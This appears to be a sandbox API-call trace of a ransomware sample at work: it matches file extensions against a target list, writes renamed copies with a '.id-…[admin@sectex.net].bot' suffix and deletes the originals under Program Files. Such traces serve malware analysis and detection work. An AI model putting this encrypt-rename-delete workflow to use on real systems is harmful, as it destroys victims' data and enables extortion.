	[0055.499] lstrlenW (lpString=".pdf") returned 4
	[0055.499] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.499] lstrlenW (lpString=".xls") returned 4
	[0055.499] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.499] lstrlenW (lpString=".xlsx") returned 5
	[0055.499] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0055.499] lstrlenW (lpString=".ppt") returned 4
	[0055.499] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.499] lstrlenW (lpString=".zip") returned 4
	[0055.499] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.499] lstrlenW (lpString=".rar") returned 4
	[0055.499] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.499] lstrlenW (lpString=".bz2") returned 4
	[0055.499] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.499] lstrlenW (lpString=".7z") returned 3
	[0055.499] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.499] lstrlenW (lpString=".dbf") returned 4
	[0055.499] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.499] lstrlenW (lpString=".1cd") returned 4
	[0055.500] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.500] lstrlenW (lpString=".jpg") returned 4
	[0055.500] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.500] lstrlenW (lpString=".doc") returned 4
	[0055.500] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.500] lstrlenW (lpString=".docx") returned 5
	[0055.500] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0055.500] lstrlenW (lpString=".pdf") returned 4
	[0055.500] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.500] lstrlenW (lpString=".xls") returned 4
	[0055.500] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.500] lstrlenW (lpString=".xlsx") returned 5
	[0055.500] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0055.500] lstrlenW (lpString=".ppt") returned 4
	[0055.500] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.500] lstrlenW (lpString=".zip") returned 4
	[0055.500] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.500] lstrlenW (lpString=".rar") returned 4
	[0055.500] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.500] lstrlenW (lpString=".bz2") returned 4
	[0055.500] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.500] lstrlenW (lpString=".7z") returned 3
	[0055.500] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.500] lstrlenW (lpString=".dbf") returned 4
	[0055.500] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.500] lstrlenW (lpString=".1cd") returned 4
	[0055.500] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.500] lstrlenW (lpString=".jpg") returned 4
	[0055.501] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.501] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0055.501] lstrlenW (lpString="MSCDM.DLL") returned 9
	[0055.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.501] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=419232) returned 1
	[0055.501] CloseHandle (hObject=0x234) returned 1
	[0055.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll")) returned 0x20
	[0055.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.501] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.502] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0055.502] GetLastError () returned 0x0
	[0055.502] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x665a0, lpOverlapped=0x0) returned 1
	[0055.528] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x665b0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x665b0, lpOverlapped=0x0) returned 1
	[0055.539] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.539] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0055.539] SetEndOfFile (hFile=0x158) returned 1
	[0055.539] CloseHandle (hObject=0x158) returned 1
	[0055.539] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.539] SetEndOfFile (hFile=0x234) returned 1
	[0055.543] CloseHandle (hObject=0x234) returned 1
	[0055.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.543] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll")) returned 1
	[0055.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.543] lstrlenW (lpString=".doc") returned 4
	[0055.543] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.543] lstrlenW (lpString=".docx") returned 5
	[0055.543] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0055.543] lstrlenW (lpString=".pdf") returned 4
	[0055.544] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString=".xls") returned 4
	[0055.544] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString=".xlsx") returned 5
	[0055.544] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0055.544] lstrlenW (lpString=".ppt") returned 4
	[0055.544] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.544] lstrlenW (lpString=".zip") returned 4
	[0055.544] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString=".rar") returned 4
	[0055.544] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString=".bz2") returned 4
	[0055.544] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.544] lstrlenW (lpString=".7z") returned 3
	[0055.544] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.544] lstrlenW (lpString=".dbf") returned 4
	[0055.544] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.544] lstrlenW (lpString=".1cd") returned 4
	[0055.544] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.544] lstrlenW (lpString=".jpg") returned 4
	[0055.544] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.544] lstrlenW (lpString=".doc") returned 4
	[0055.544] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString=".docx") returned 5
	[0055.544] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0055.544] lstrlenW (lpString=".pdf") returned 4
	[0055.544] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.544] lstrlenW (lpString=".xls") returned 4
	[0055.544] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.545] lstrlenW (lpString=".xlsx") returned 5
	[0055.545] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0055.545] lstrlenW (lpString=".ppt") returned 4
	[0055.545] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.545] lstrlenW (lpString=".zip") returned 4
	[0055.545] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.545] lstrlenW (lpString=".rar") returned 4
	[0055.545] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.545] lstrlenW (lpString=".bz2") returned 4
	[0055.545] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.545] lstrlenW (lpString=".7z") returned 3
	[0055.545] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.545] lstrlenW (lpString=".dbf") returned 4
	[0055.545] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.545] lstrlenW (lpString=".1cd") returned 4
	[0055.545] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72
	[0055.545] lstrlenW (lpString=".jpg") returned 4
	[0055.545] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.545] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0055.545] lstrlenW (lpString="msinfo32.exe.mui") returned 16
	[0055.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.546] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=26624) returned 1
	[0055.546] CloseHandle (hObject=0x234) returned 1
	[0055.546] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0x20
	[0055.546] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0055.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.546] lstrlenW (lpString=".doc") returned 4
	[0055.546] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.546] lstrlenW (lpString=".docx") returned 5
	[0055.546] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0055.546] lstrlenW (lpString=".pdf") returned 4
	[0055.546] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.546] lstrlenW (lpString=".xls") returned 4
	[0055.546] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.546] lstrlenW (lpString=".xlsx") returned 5
	[0055.546] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0055.547] lstrlenW (lpString=".ppt") returned 4
	[0055.547] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.547] lstrlenW (lpString=".zip") returned 4
	[0055.547] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.547] lstrlenW (lpString=".rar") returned 4
	[0055.547] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.547] lstrlenW (lpString=".bz2") returned 4
	[0055.547] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.547] lstrlenW (lpString=".7z") returned 3
	[0055.547] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.547] lstrlenW (lpString=".dbf") returned 4
	[0055.547] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.547] lstrlenW (lpString=".1cd") returned 4
	[0055.547] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.547] lstrlenW (lpString=".jpg") returned 4
	[0055.547] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.547] lstrlenW (lpString=".doc") returned 4
	[0055.547] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.547] lstrlenW (lpString=".docx") returned 5
	[0055.547] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0055.547] lstrlenW (lpString=".pdf") returned 4
	[0055.547] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.547] lstrlenW (lpString=".xls") returned 4
	[0055.547] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.547] lstrlenW (lpString=".xlsx") returned 5
	[0055.547] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0055.547] lstrlenW (lpString=".ppt") returned 4
	[0055.547] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.548] lstrlenW (lpString=".zip") returned 4
	[0055.548] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.548] lstrlenW (lpString=".rar") returned 4
	[0055.548] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.548] lstrlenW (lpString=".bz2") returned 4
	[0055.548] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.548] lstrlenW (lpString=".7z") returned 3
	[0055.548] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.548] lstrlenW (lpString=".dbf") returned 4
	[0055.548] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.548] lstrlenW (lpString=".1cd") returned 4
	[0055.548] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76
	[0055.548] lstrlenW (lpString=".jpg") returned 4
	[0055.548] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.548] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0055.548] lstrlenW (lpString="msinfo32.exe") returned 12
	[0055.548] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.549] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=378880) returned 1
	[0055.549] CloseHandle (hObject=0x234) returned 1
	[0055.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe")) returned 0x20
	[0055.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0055.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.549] lstrlenW (lpString=".doc") returned 4
	[0055.549] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0055.549] lstrlenW (lpString=".docx") returned 5
	[0055.549] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1
	[0055.549] lstrlenW (lpString=".pdf") returned 4
	[0055.549] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0055.549] lstrlenW (lpString=".xls") returned 4
	[0055.549] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0055.549] lstrlenW (lpString=".xlsx") returned 5
	[0055.549] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1
	[0055.549] lstrlenW (lpString=".ppt") returned 4
	[0055.549] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0055.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.549] lstrlenW (lpString=".zip") returned 4
	[0055.549] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0055.549] lstrlenW (lpString=".rar") returned 4
	[0055.549] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0055.549] lstrlenW (lpString=".bz2") returned 4
	[0055.550] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0055.550] lstrlenW (lpString=".7z") returned 3
	[0055.550] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0055.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.550] lstrlenW (lpString=".dbf") returned 4
	[0055.550] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0055.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.550] lstrlenW (lpString=".1cd") returned 4
	[0055.550] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0055.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.550] lstrlenW (lpString=".jpg") returned 4
	[0055.550] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0055.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.550] lstrlenW (lpString=".doc") returned 4
	[0055.550] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0055.550] lstrlenW (lpString=".docx") returned 5
	[0055.550] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1
	[0055.550] lstrlenW (lpString=".pdf") returned 4
	[0055.550] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0055.550] lstrlenW (lpString=".xls") returned 4
	[0055.550] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0055.550] lstrlenW (lpString=".xlsx") returned 5
	[0055.550] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1
	[0055.550] lstrlenW (lpString=".ppt") returned 4
	[0055.550] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0055.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.550] lstrlenW (lpString=".zip") returned 4
	[0055.550] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0055.550] lstrlenW (lpString=".rar") returned 4
	[0055.550] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0055.550] lstrlenW (lpString=".bz2") returned 4
	[0055.550] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0055.550] lstrlenW (lpString=".7z") returned 3
	[0055.551] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0055.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.551] lstrlenW (lpString=".dbf") returned 4
	[0055.551] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0055.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.551] lstrlenW (lpString=".1cd") returned 4
	[0055.551] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0055.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66
	[0055.551] lstrlenW (lpString=".jpg") returned 4
	[0055.551] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0055.551] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0055.551] lstrlenW (lpString="ACEINTL.DLL") returned 11
	[0055.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.551] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=198056) returned 1
	[0055.552] CloseHandle (hObject=0x234) returned 1
	[0055.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 0x20
	[0055.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
